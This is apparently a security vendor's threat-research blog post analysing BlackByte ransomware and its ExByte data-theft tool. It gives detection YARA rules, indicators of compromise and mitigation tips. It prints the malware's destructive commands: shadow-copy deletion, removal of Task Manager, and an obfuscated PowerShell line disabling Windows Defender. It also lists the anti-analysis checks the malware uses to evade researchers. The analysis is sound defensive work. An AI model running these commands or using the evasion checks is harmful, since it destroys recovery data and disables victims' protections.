Skip Navigation
BlackBerry Blog

BlackByte Ransomware Takes an Extra Bite Using Double Extortion Methods

The BlackByte ransomware variant was first discovered in summer 2021 and has since then produced many new variants, with the latest being spotted in the wild in recent months. BlackByte is a prolific Ransomware-as-a-Service (RaaS) malware which utilizes an increasingly popular double extortion method. In this type of attack, the threat actor both exfiltrates and encrypts the victims’ data. This gives the attacker additional leverage when attempting to collect a ransom payment from the victim, as they can threaten to publish or sell potentially sensitive data on the dark web if their demands are not met.

In addition, recent BlackByte operators have been spotted leveraging a custom exfiltration tool which has been dubbed ‘ExByte’ in order to steal the victims’ data, pre-encryption. Once exfiltrated, the stolen files are uploaded to the Mega cloud storage service.

Operating System

Risk & Impact

Technical Analysis

Initially, BlackByte samples were written in the “C” programming language; however, in recent variations there has been a shift to files written in the more uncommon “Go” language, with some being a hybrid of both programming languages. Most samples in the wild are UPX packed, with many new variants being packed by a custom UPX packer. UPX is a free executable packer for several executable formats.

Typically, the malware sports an icon of the Grim Reaper with the lettering ‘BB’ on the character's robes, which stands for BlackByte.

Figure 1 - “Grim Reaper” icon used by BlackByte malware

To make the malware appear legitimate and aid it in remaining hidden on the victim’s system, the file uses a product description similar to legitimate programs. In the case of the sample analyzed by BlackBerry threat researchers for this report, it was masquerading as an Amazon Corp file.

Figure 2 - Malware masquerades a legitimate program

System Checks

When executed, the ransomware will check the victims’ system language against the language IDs shown below. If any of them match, the malware will exit and not perform the encryption process.

Country

Language Code

Armenia

1067

Azerbaijan

2092

Belarus

1059

Kazakhstan

1087

Russia

1049

Tajik

1064

Uzbek

2115

Ukraine

1058

Georgia

1079

Turkmen

1090


Additionally, the malware will perform a check against the below list of DLL modules which are related to malware analysis tools. If present, the malware will immediately exit, and encryption will not be carried out. This is presumably to aid BlackByte in remaining undetected by malware researchers.

DLL Name

Description

DBGHELP.DLL

Windows Dbg

SbieDll.dll

Sandboxie

SxIn.dll

Qihu 360

Sf2.dll

Avast

snxhl.dll

Avast

cmdvrt32.dll

Comodo


Access and Persistence

Upon execution, this ransomware deletes volume shadow copies and system backups to hamper recovery efforts by the user. This is done by utilizing ‘cmd.exe’ to issue the following command:

“cmd.exe /c start vssadmin.exe Delete Shadows /All /Quiet
vssadmin Resize ShadowStorage /For=K: /On=K: /MaxSize=401MB”


In addition to this, BlackByte will issue commands to remove the task manager and resource monitor along with stopping the Windows Defender service from running:

cmd /c del C:\Windows\System32\Taskmgr.exe /f /q & del C:\Windows\System32\resmon.exe /f/q&
powershell -command "$x =

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
('V'+'wBp'+'A'+'G4AR'+'AB'+'lAG'+'YAZQBuAGQA'));Stop-Service -Name $x;Set-Service-StartupType Disabled 


File Types

BlackByte malware avoids encrypting files with the following file extensions:

msilog

dekthemepack

nomedia

exe

ldf

msu

diagpkg

lock

cab

log

rtp

icl

theme

msp

ocx

msi

idx

rom

sys

ani

prf

wpx

386

themepack

cpl

diagcfg

msstyles

adv

bin

icns

msc

mod

mpa

scr

ics

drv

key

com

cur

ico

hlp

diagcab

dll

spl

cmd

hta

nls

shs


Encryption

When BlackByte is executed, it attempts to connect to a hardcoded URL that hosts a .PNG file. This file masquerades as an image file, in this case, “spider.png.” However, the file contains a raw encryption key which is used in the ransomware’s encryption process. Should the malware fail to download the file which contains this key, the process will crash, and the encryption will not be carried out.

When the encryption process is underway, the malware will begin to enumerate the target machine’s drives. Files are encrypted using an AES symmetric-key algorithm using the raw key which was obtained from the .PNG file mentioned above. Once files have been successfully encrypted, they are appended with a “.Blackbyte” extension.

The Ransom Note

Upon completion of encryption, the malware will drop a file to the desktop called “BlackByte_restoremyfiles.txt” which outlines the situation to the victim. The note provides a guide on how the user can attempt to restore their files, and warns them against attempting to use third party decryption tools.

Figure 3 - Ransom note dropped to the victims’ desktop post encryption

Within the ransom note the attacker provides a URL and a “chat” access key to the victim. The URL can be accessed via the Tor browser. When visited, this takes the victim to the negotiation portal, as seen below in Figure 4. The web page gives a detailed guide on how the victim can pay the ransom and (theoretically) retrieve their files.

Figure 4 - Negotiation website for victim to contact the attacker and recover files

ExByte

Recently, instances of BlackByte have been spotted utilizing a custom-made exfiltration tool dubbed ExByte. The tool is written in the “Go” programming language.

Upon execution, ExByte performs a series of checks to see if it is being run in a sandbox or virtual environment. This is done to impede researchers who may be trying to analyze the tool. It does this by calling the ‘IsDebuggerPresent’ and ‘CheckRemoteDebuggerPresent’ APIs. It will then check to see if any of the following programs are running on the target machine:

  • x64dbg
  • x32dbg
  • OLLYDBG
  • WinDbg
  • The Interactive Disassembler
  • Immunity Debugger - [CPU]
  • MegaDumper 1.0 by CodeCracker / SnD
  • Import Reconstructor

It will then check for the presence of the following list of antivirus (AV) and sandbox-related DLL files:

  • avghooka.dll
  • avghookx.dll
  • sxin.dll
  • sf2.dll
  • sbiedll.dll
  • snxhk.dll
  • cmdvrt32.dll
  • cmdvrt64.dll
  • wpespy.dll
  • vmcheck.dll
  • pstorec.dll
  • dir_watch.dll
  • api_log.dll
  • dbghelp.dll

Once the malware has confirmed that it is not running in a sandbox environment, it will begin enumerating the victim’s machine in search of files to steal. All gathered files are stored in a folder in the “AppData/dummy” directory and are then uploaded to an account on the Mega cloud-storage service. The credentials for this account are hardcoded into the malware.

Conclusion

BlackByte shows no signs of slowing down in recent months, with the malware receiving various updates since its emergence just over a year ago. The creation of a custom exfiltration tool indicates that the malware is still evolving. It will come as no surprise should the threat actors behind BlackByte continue to attack and attempt to extort major companies in the coming months and potentially years.

Who is Affected?

Previous attacks carried out by BlackByte have seen the ransomware targeting mainly U.S. based infrastructure, with their most prolific attack to date being carried out on the NFL 49ers. However, with the expected continued growth of this malware family, it would be naïve to assume that this will be the sole target going forward, and everyone should remain vigilant.

Mitigation Tips

Steps that can be put in place to mitigate the effects of the attack mentioned in this report include:

  • Install and regularly update AV software on all hosts on your network.
  • Disable hyperlinks in received emails.
  • Ensure that regular password-protected copies of sensitive data are made in both online and offline storage devices.
  • Implement Multi-Factor Authentication (MFA) when logging into accounts or services (MITRE D3FEND™ technique D3-MFA)

YARA Rule

The following YARA rule was authored by the BlackBerry Research & Intelligence Team to catch the threat described in this document:

import "pe"
rule BlackByte_Ransomware {
   meta:
      description = "Detects BlackByte Ransomware"
      author = "BlackBerry Threat Research Team"
      date = "2022-10-23"
      hash = "1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"
      license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"

   condition:
   (
   //PE File
   uint16(0) == 0x5a4d and

   //Imphash
   pe.imphash() == "7c3782f1285f48d8c9a17be8db65b02d" and

    pe.sections[0].name contains "UPX0" and
    pe.sections[1].name contains "UPX1" )
}


import "pe"

rule BlackByte_Unpacked {
   meta:
      description = "Detects BlackByte Unpacked Ransomware"
      author = "BlackBerry Threat Research Team"
      date = "2022-10-23"
      license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"

   strings:
      $s1 = "BlackByteGO/_cgo_gotypes.go" ascii wide
      $s2 = "main.DelShadows"
      $s3 = "main.Aes256Encr"
      $s4 = "main.ShowNote"

   condition:
   (
   //PE File
   uint16(0) == 0x5a4d and

   //All Strings
   all of ($s*) )
}


Indicators of Compromise (IoCs)

1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad – BlackByte

94ce428f04f35e434dc9bd81e17fe506d8f81fe51ea40fca530f1f2ef00e2881 – BlackByte unpacked

0097b8722c8c0840e8c1a4dd579438344b3e6b4d630d17b0bbe9c55159f43142 – ExByte

Hxxp://13.107[.]4.50/spider.png – Raw encryption key download link


References

https://www.bleepingcomputer.com/news/security/nfls-san-francisco-49ers-hit-by-blackbyte-ransomware-attack/

https://latesthackingnews.com/2022/10/11/blackbyte-ransomware-exploits-vulnerable-windows-driver-to-escape-detection/

BlackBerry Assistance

If you’re battling this malware or a similar threat, you’ve come to the right place, regardless of your existing BlackBerry relationship.

The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.

We have a global consulting team standing by to assist you, providing around-the-clock support where required, as well as local assistance. Please contact us here: https://www.blackberry.com/us/en/forms/cylance/handraiser/emergency-incident-response-containment

Related Reading:

The BlackBerry Research and Intelligence Team

About The BlackBerry Research and Intelligence Team

The BlackBerry Research and Intelligence team is a highly experienced threat research group specializing in a wide range of cybersecurity disciplines, conducting continuous threat hunting to provide comprehensive insights into emerging threats. We analyze and address various attack vectors, leveraging our deep expertise in the cyberthreat landscape to develop proactive strategies that safeguard against adversaries.

Whether it's identifying new vulnerabilities or staying ahead of sophisticated attack tactics, we are dedicated to securing your digital assets with cutting-edge research and innovative solutions.